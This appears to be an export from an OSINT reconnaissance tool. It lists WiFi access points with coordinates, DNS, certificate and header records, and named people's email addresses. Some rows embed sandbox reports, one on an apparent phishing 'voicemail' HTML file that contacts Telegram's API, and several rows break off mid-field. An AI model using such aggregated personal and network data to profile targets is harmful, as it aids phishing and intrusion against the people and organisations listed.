| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Vienna (Net ID: 00:09:5B:B1:9F:16) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:53:17 | IPv6 Address | No | Mnemonic PassiveDNS | 16 | 0 | 1 | 0 | None | 2a06:98c1:3120::1 | ayhu.xyz |
| 2023-05-12 02:59:59 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | robert@broofa.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://cndglobelogistics.com/index.php/about', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_f2c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_f2c_IESQMMUTEX_0_331"\n "IsoScope_f2c_IESQMMUTEX_0_519"\n "IsoScope_f2c_IE_EarlyTabStart_0x948_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_f2c_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3884"\n "IsoScope_f2c_ConnHashTable<3884>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3884"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"31.220.3.218:443"\n "104.21.89.62:443"\n "172.64.133.15:443"\n "142.250.189.170:443"\n "104.17.24.14:443"\n "151.101.1.229:443"\n "142.250.191.46:443"\n "69.16.175.10:443"\n "185.199.109.153:443"\n "142.250.188.3:443"\n "142.250.191.67:443"\n "142.251.46.170:443"\n "104.22.24.131:443"\n "52.155.62.95:443"\n "172.67.38.66:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.jsdelivr.net"\n "cdn.lineicons.com"\n "cdnjs.cloudflare.com"\n "cndglobelogistics.com"\n "code.jquery.com"\n "embed.tawk.to"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "parsleyjs.org"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"\n "translate.google.com"\n "translate.googleapis.com"\n "use.fontawesome.com"\n "va.tawk.to"\n "www.gstatic.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<div class="col-lg-auto col-4 my-3"><img src="/images/clients/youtube.png" alt="YouTube Thumb" /></div>" (Indicator: "dir "; File: "about_2_.htm")\n Found string "* Copyright 2011-2019 Twitter, Inc." (Indicator: "dir "; File: "style-a984db922da29019ca5adc1e5082e607_1_.css")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar642D.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-373', u'name': u'Contains ability to send data (Powershell command string)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "Out-Default"; File: "about_2_.htm")\n Found string "<body class="site astroid-framework com-jdbuilder view-page layout-default itemid-105 article-padding-none about tp-style-12 ltr en-GB">" (Indicator: "Out-Default"; File: "about_2_.htm")\n file/memory contains long string with (Indicator: "Out-Default"; File: "urlref_httpscndglobelogistics.comindex.phpabout")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"iStock_000039291924_Medium_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 progressive precision 8 1934x993 components 3" and extension "jpg"\n "cnclogistics-2_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 300x300 segment length 16 Exif Standard: [TIFF image data big-endian direntries=4] baseline precision 8 693x555 components 4" and extension "jpg"\n "business-man_1_.png" has type "PNG image data 475 x 665 8-bit/color RGBA non-interlaced" and extension "png"\n "NickCusworth_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 Exif Standard: [TIFF image data big-endian direntries=21 manufacturer=Canon model=Canon EOS 5D Mark III orientation=upper-left software=Microsoft Windows Photo Viewer 6.1.7600.16385 datetime=2013:11:04 12:20:51] baseline precision 8 148x197 components 3" and extension "jpg"\n "16_1_.png" has type "PNG image data 716 x 1016 8-bit/color RGBA non-interlaced" and extension "png"\n "joomla_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "evernote_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "adobe_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "youtube_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "googledrive_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "cisco_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "arrow_down_1_.png" has type "PNG image data 5 x 3 8-bit/color RGBA non-interlaced" and extension "png"\n "switcher_1_.png" has type "PNG image data 10 x 19 8-bit/color RGBA non-interlaced" and extension "png"\n "blank_1_.png" has type "PNG image data 1 x 1 1-bit colormap non-interlaced" and extension "png"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab641D.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab641D.tmp]- [targetUID: 00000000-00001016]'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\program files\\internet explorer\\iexplore.exe"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df2c8ce3db8adea7b0.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{1e3592f3-ee3f-11ed-905e-080027ef242f}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df5204982cf225e3cc.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{1e3592f5-ee3f-11ed-905e-080027ef242f}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{1e3592f3-ee3f-11ed-905e-080027ef242f}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df2c8ce3db8adea7b0.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "style-a984db922da29019ca5adc1e5082e607_1_.css" has type "ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "iStock_000039291924_Medium_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 progressive precision 8 1934x993 components 3"- [targetUID: N/A]\n "cnclogistics-2_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 300x300 segment length 16 Exif Standard: [TIFF image data big-endian direntries=4] baseline precision 8 693x555 components 4"- [targetUID: N/A]\n "business-man_1_.png" has type "PNG image data 475 x 66 |
| 2023-05-12 02:53:20 | IP Address | No | Mnemonic PassiveDNS | 0 | 0 | 2 | 0 | None | 64.226.81.43 | kekw.battleb0t.xyz |
| 2023-05-12 02:53:32 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 54113 | 185.199.111.153 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BSL (Net ID: 00:02:2D:39:EF:C9) | 37.7642, -122.3993 |
| 2023-05-12 03:10:00 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 5 | 0 | None | ondigitalocean.com | netherlands-18708423.mongo.ondigitalocean.com |
| 2023-05-12 02:59:56 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | fernando.r@alliedglobal.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 15, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'Voicemail Message (Elodie Raven_ Fernando R ) From_(178-077-5401)_part_001.html', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "widevinecdm.dll" as clean (type is "PE32+ executable (DLL) (console) x86-64 for MS Windows")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.22.58.100:443"\n "185.199.110.153:443"\n "13.227.74.112:443"\n "149.154.167.220:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5828:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "Local\\SM0:5828:304:WilStaging_02"\n "Local\\SM0:5828:120:WilError_01"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5828:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:8140:304:WilStaging_02"\n "Local\\SM0:8140:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6188:304:WilStaging_02"\n "Local\\SM0:6188:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.telegram.org"\n "getbootstrap.com"\n "zeptojs.com"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\5828_1708721866\\shopping_iframe_driver.js]- [targetUID: 00000000-00005828]\n Dropped file: "product_page.js" - Location: [%TEMP%\\5828_1708721866\\product_page.js]- [targetUID: 00000000-00005828]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\5828_946205218\\adblock_snippet.js]- [targetUID: 00000000-00005828]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\5828_1708721866\\auto_open_controller.js]- [targetUID: 00000000-00005828]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\5828_1708721866\\edge_checkout_page_validator.js]- [targetUID: 00000000-00005828]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\5828_1708721866\\shoppingfre.js]- [targetUID: 00000000-00005828]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\5828_1708721866\\edge_tracking_page_validator.js]- [targetUID: 00000000-00005828]\n Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\5828_1708721866\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00005828]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-33', u'name': u'Drops executable files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%TEMP%\\5828_1392880218\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00005828]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%TEMP%\\5828_1392880218\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00005828]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00005828]\n "Part-DE" has type "data"- Location: [%TEMP%\\5828_946205218\\Part-DE]- [targetUID: 00000000-00005828]\n "6373a9a3-7787-4e10-8766-4a701eb0bde9.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\6373a9a3-7787-4e10-8766-4a701eb0bde9.tmp]- [targetUID: 00000000-00006188]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00005828]\n "LICENSE" has type "ASCII text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.41\\LICENSE]- [targetUID: 00000000-00005828]\n "75eccbf3-b65d-4d67-bf83-de033f7007cc.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\75eccbf3-b65d-4d67-bf83-de033f7007cc.tmp]- [targetUID: 00000000-00005828]\n "shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\shopping.js]- [targetUID: 00000000-00005828]\n "7de06ccc-e1f1-446e-9777-eeec16b06646.tmp" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\7de06ccc-e1f1-446e-9777-eeec16b06646.tmp]- [targetUID: 00000000-00005828]\n "e3268b96-87e6-41f7-9441-5c4416dab6c3.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\e3268b96-87e6-41f7-9441-5c4416dab6c3.tmp]- [targetUID: 00000000-00005828]\n "d2a4e9f5-a74b-406f-8c0f-67bbb0725fef.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\d2a4e9f5-a74b-406f-8c0f-67bbb0725fef.tmp]- [targetUID: 00000000-00005828]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00005828]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.24\\Ruleset Data]- [targetUID: 00000000-00005828]\n "39d75e53-4923-4b9e-bc44-d169ef496172.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\39d75e53-4923-4b9e-bc44-d169ef496172.tmp]- [targetUID: 00000000-00005828]\n "72e56d01-e7ac-415a-b604-164a33d2eb3d.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\72e56d01-e7ac-415a-b604-164a33d2eb3d.tmp]- [targetUID: 00000000-00005828]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.24\\manifest.fingerprint]- [targetUID: 00000000-00005828]\n "8590c4d3-1805-4c87-83be-f642e5ed3447.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\8590c4d3-1805-4c87-83be-f642e5ed3447.tmp]- [targetUID: 00000000-00005828]\n "verified_contents.json" has type "JSON data"- Location: [%TEMP%\\5828_1392880218\\_metadata\\verified_contents.json]- [targetUID: 00000000-00005828]\n "shopping_iframe_driver.js" has type "ASCII text with very long lines with CRLF line terminators"- Location: [%TEMP%\\5828_1708721866\\shopping_iframe_driver.js]- [targetUID: 00000000-00005828]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\AutofillStrikeDatabase\\LOG]- [targetUID: 00000000-00005828]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%TEMP%\\5828_1392880218\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00005828]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Potential IP "10.34.0.41" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.41"\n Potential IP "10.34.0.41" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.41\\LICENSE"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-54', u'name': u'Making HTTPS connections using secure TLS/SSL version', u'attck_id_wiki': |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-timer: S1683860053.299752,VS0,VE13 | {"content-length": "1591", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-1999\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-lga21982-LGA", "x-origin-cache": "HIT", "x-cache": "MISS", "x-github-request-id": "69FA:0168:26C3619:3A6662D:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "81f392d6f8601ba9f7017cc835b0845172eec1e9", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.299752,VS0,VE13", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/css; charset=utf-8"} |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ^[^_^_^Y^I (Net ID: 00:02:2D:6F:81:A0) | 34.0544, -118.244 |
| 2023-05-12 02:54:38 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5b5dccec8f8690-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 172.67.168.252 |
| 2023-05-12 02:44:28 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:89:fe:30:65:f6:62:86:64:4f:34:07:5e:a0:a9:be:d2:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 15:55:50 2022 GMT
Not After : Mar 13 15:55:49 2023 GMT
Subject: CN=vscode.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:b5:70:98:56:04:62:cd:9d:91:8b:97:7d:1f:67:
df:fd:40:4a:9e:a1:91:56:27:b2:c2:dc:db:18:7e:
90:b1:64:8c:6c:fd:2c:13:2d:ed:56:f7:36:ce:08:
2a:4a:36:14:30:02:df:d6:0f:d4:6c:7a:48:c9:01:
c5:bb:35:51:b6:01:95:98:7e:7b:4e:66:e0:84:62:
5a:92:58:14:ee:5f:0c:a5:3c:c0:6e:d5:a8:57:bb:
5b:46:82:bd:d9:28:fb:d9:2e:3c:cc:45:f6:41:c3:
2e:de:7e:83:17:a8:54:29:45:21:09:97:4c:fd:ed:
49:50:3b:81:1e:21:32:31:1d:79:ca:01:4a:ed:57:
fb:ff:6e:4d:44:22:c0:1f:54:2a:4f:e7:63:84:83:
2d:a4:25:2d:2e:38:54:17:99:ab:10:e9:5b:8e:64:
39:42:16:09:1d:92:05:aa:12:42:2e:33:56:a8:cb:
fa:cc:fe:15:09:1e:32:19:c2:f5:b5:fb:c3:50:cf:
4f:6c:46:9f:4a:26:a1:f6:b4:2c:c4:b6:e7:cf:c8:
0d:46:d3:02:56:c6:06:76:a6:5d:74:73:25:8a:74:
76:91:9c:94:b2:8b:47:bc:85:62:1a:aa:eb:32:0b:
97:18:b1:e4:f7:a7:1d:6d:50:4d:60:e9:30:d9:24:
3b:77:00:5c:86:fe:be:60:06:dd:41:13:db:73:e0:
c7:a6:69:d8:87:8d:f3:d9:19:43:f8:26:44:9c:46:
67:0b:09:0b:9b:db:37:73:fe:d3:c4:35:3e:63:88:
04:bf:f1:31:5f:68:76:f4:78:92:74:5e:90:26:85:
91:b2:c5:89:7c:e7:fd:90:5c:fb:08:d7:ec:7e:80:
bb:0c:21:cf:d6:c2:40:71:78:96:82:d9:32:54:0f:
4d:96:8c:31:42:ff:aa:a0:84:60:76:09:ee:ce:f1:
29:2b:47:e4:6d:53:c1:f3:6f:e1:43:b1:b5:0b:95:
35:33:7b:67:7a:23:ed:15:76:d9:5e:2f:96:95:57:
e5:56:fa:b4:14:d2:53:87:b2:95:ae:4a:c1:23:a4:
44:71:bc:56:67:dd:1d:18:ac:3b:6c:70:1c:35:da:
1c:0d:c0:ed:48:c3:e4:31:1a:74:9f:07:d7:d2:a2:
66:5e:12:e5:58:f2:5f:0c:2a:db:70:d9:e5:73:16:
75:7c:43:25:43:03:62:18:4f:72:50:53:b3:8a:1a:
b1:9c:46:ec:4a:d2:cb:cc:b8:7b:e9:84:cb:e1:b2:
ab:6c:e1:58:25:e1:54:f1:50:6c:98:68:55:60:cd:
f6:ef:3e:df:e4:c2:e3:11:66:4c:2d:50:b9:ef:ad:
19:0b:a7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
C4:B4:9F:3E:13:AF:1E:ED:5D:1E:C0:B3:15:A8:37:84:5F:58:79:25
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:vscode.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 13 16:55:50.449 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:83:63:FF:85:C1:92:6A:F0:48:97:56:
6A:A1:9A:CD:CD:96:31:BB:FB:75:C5:76:C0:D5:93:B6:
FA:22:8A:0A:B2:02:21:00:D0:25:C4:C4:9C:87:C7:8A:
D8:88:7C:0F:ED:E3:EE:A9:F5:8D:1E:8A:7D:57:63:8B:
34:EA:A9:AA:0E:B7:1F:86
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 13 16:55:50.476 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:54:A3:38:5D:40:4F:67:06:7D:10:18:A9:
8D:94:8F:5C:FA:96:C9:CD:18:CE:28:22:68:39:92:D0:
96:C8:FF:F6:02:20:1D:2D:AD:B7:86:08:EE:7E:EE:05:
FA:EC:70:98:F7:7B:A0:74:8A:7A:10:64:BF:3C:10:A9:
7A:16:EC:A7:CC:4B
Signature Algorithm: sha256WithRSAEncryption
20:7b:5f:2b:bd:28:eb:4d:bf:d7:77:bb:a0:1a:8f:df:78:60:
37:c8:a6:0a:7a:b4:17:f5:92:59:69:c6:b8:6a:7b:eb:7c:d1:
4d:b7:1f:8a:b6:a8:fe:6f:70:f7:71:12:28:35:3b:1d:c9:e2:
